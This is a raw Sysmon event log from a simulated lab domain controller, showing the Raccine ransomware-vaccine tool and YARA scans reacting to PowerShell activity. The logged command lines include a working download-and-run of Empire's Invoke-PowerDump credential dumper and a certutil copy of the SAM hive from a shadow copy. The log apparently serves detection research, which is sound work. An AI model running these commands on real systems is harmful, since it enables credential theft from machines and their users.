Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164583Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.536{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002164568Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.528{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002164501Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.488{9DBE88B5-C32E-61A8-0C00-000000000E02}8485240C:\Windows\system32\svchost.exe{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164500Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.487{9DBE88B5-3BBC-61B2-6805-010000000E02}57644776C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+5894|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164497Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.482{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002164481Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.474{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002164412Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.423{9DBE88B5-C32E-61A8-0C00-000000000E02}8485240C:\Windows\system32\svchost.exe{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164411Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.422{9DBE88B5-3BBC-61B2-6805-010000000E02}57644776C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBC-61B2-6905-010000000E02}7952C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+57ef|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x80000000000000002164410Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.418{9DBE88B5-3BBC-61B2-6805-010000000E02}5764ATTACKRANGE\AdministratorC:\Program Files\Raccine\Raccine.exeC:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac665.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002164408Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.412{9DBE88B5-3BBC-61B2-6805-010000000E02}57644776C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBC-61B2-6905-010000000E02}7952C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1c3aC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+c6f00|C:\Windows\System32\KERNELBASE.dll+c6e21|C:\Program Files\Raccine\Raccine.exe+1876|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164403Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.411{9DBE88B5-3BBC-61B2-6805-010000000E02}57644776C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBC-61B2-6905-010000000E02}7952C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+1848|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164402Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.411{9DBE88B5-3BBC-61B2-6905-010000000E02}7952C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} 10341000x80000000000000002164401Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.403{9DBE88B5-3AAE-61AE-0EA8-000000000E02}68046848C:\Windows\system32\conhost.exe{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164400Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.401{9DBE88B5-3AAE-61AE-0DA8-000000000E02}67766968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c01f5|UNKNOWN(00007FF9867AB323) 10341000x80000000000000002164395Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.398{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164394Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.398{9DBE88B5-3AAE-61AE-0DA8-000000000E02}67766968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\207926782604047fb43c0980a31be783\Microsoft.PowerShell.Commands.Management.ni.dll+8657f278(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\207926782604047fb43c0980a31be783\Microsoft.PowerShell.Commands.Management.ni.dll+8657f278(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\207926782604047fb43c0980a31be783\Microsoft.PowerShell.Commands.Management.ni.dll+8657f278(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\207926782604047fb43c0980a31be783\Microsoft.PowerShell.Commands.Management.ni.dll+8657f278(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e2995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e27fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c986b92d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97daa82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca2ab304(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97a002a(wow64)|UNKNOWN(00007FF9867DC5C8) 154100x80000000000000002164393Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:12.398{9DBE88B5-3BBC-61B2-6805-010000000E02}5764C:\Program Files\Raccine\Raccine.exe1.4.2.0 BETAA Simple Ransomware Vaccine - see https://github.com/Neo23x0/RaccineRaccineRaccineRaccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" certutil -f -v -encodehex $shadowpath $ENV:temp\myhive 2} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=287F6CFBFFD83B75A0F8F749B0F636F3,SHA256=E5364CE4BD1814E003215BFF10DD2F191C33199260DFD2688D4F6CCE4A7C75B8,IMPHASH=B9673CBFF2550CFBFA1668EF53412C24{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002164216Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:09.699{9DBE88B5-3BB7-61B2-4805-010000000E02}6612ATTACKRANGE\AdministratorC:\Program Files\Raccine\Raccine.exeC:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacF32B.tmpMD5=5A65B0FE1628253D28448BA6AB08135B,SHA256=50357DE8DE7821041C59AAA430145C20CD5D7549CA9A25592273905268795877,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002164196Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:08.044{9DBE88B5-3BB8-61B2-6005-010000000E02}57567824C:\Program Files\Raccine\yara64.exe{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\yara64.exe+8503f|C:\Program Files\Raccine\yara64.exe+7ce90|C:\Program Files\Raccine\yara64.exe+73b07|C:\Program Files\Raccine\yara64.exe+7303c|C:\Program Files\Raccine\yara64.exe+17c129|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164193Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:08.030{9DBE88B5-3BB8-61B2-6105-010000000E02}5436372C:\Windows\system32\conhost.exe{9DBE88B5-3BB8-61B2-6005-010000000E02}5756C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164187Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:08.017{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-3BB8-61B2-6005-010000000E02}5756C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164186Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:08.017{9DBE88B5-3BB7-61B2-4805-010000000E02}66124980C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BB8-61B2-6005-010000000E02}5756C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+116f5|C:\Program Files\Raccine\Raccine.exe+6156|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164185Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:08.017{9DBE88B5-3BB8-61B2-6005-010000000E02}5756C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\in-memory\gen_loaders.yar" 6776 -d MemoryScan=1 -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {Write-Host \''STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\'' -fore greenSet-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction IgnoreInvoke-Webrequest -Uri \''https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\'' -UseBasicParsing -OutFile \''$Env:Temp\PowerDump.ps1\''Import-Module \''$Env:Temp\PowerDump.ps1\''Invoke-PowerDump} p} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BB7-61B2-4805-010000000E02}6612C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Write-Host \""STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\"" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri \""https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\"" -UseBasicParsing -OutFile \""$Env:Temp\PowerDump.ps1\"" Import-Module \""$Env:Temp\PowerDump.ps1\"" Invoke-PowerDump} 10341000x80000000000000002164182Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:08.001{9DBE88B5-3BB7-61B2-5F05-010000000E02}2060528C:\Windows\system32\conhost.exe{9DBE88B5-3BB7-61B2-5E05-010000000E02}208C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002164176Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.990{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-3BB7-61B2-5E05-010000000E02}208C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002164175Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.989{9DBE88B5-3BB7-61B2-4805-010000000E02}66124980C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BB7-61B2-5E05-010000000E02}208C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002164174Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:07.989{9DBE88B5-3BB7-61B2-5E05-010000000E02}208C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\ryuk-commandlines.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacF32B.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {Write-Host \''STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\'' -fore greenSet-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction IgnoreInvoke-Webrequest -Uri \''https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1\'' -UseBasicParsing -OutFile \''$Env:Temp\PowerDump.ps1\''Import-Module \''$Env:Temp\PowerDump.ps1\''Invoke-PowerDump} p} " 